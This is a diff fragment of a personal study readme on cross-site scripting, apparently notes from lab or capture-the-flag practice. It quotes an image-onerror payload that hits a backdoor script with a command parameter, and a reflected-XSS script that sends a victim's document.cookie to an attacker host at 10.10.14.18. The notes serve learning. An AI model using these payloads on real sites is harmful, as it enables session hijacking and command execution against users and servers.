kymb0/web_study/XSS/readme.md

    * `<img src=x onerror=this.src="http://10.10.10.154/admin/backdoorchecker.php?cmd=dirheck>`

-4. Cookie stealing: A feared XSS flaw.
+**4. Cookie stealing:**
+A feared XSS flaw.
 Can be reflected or stored.

 	  reflected (remember that if an attack does not work, play arouund with different parameters):
 		<script> document.write("<iframe src='http://10.10.14.18:8000/test.html?cookie="+document.cookie+"'></iframe>");</script>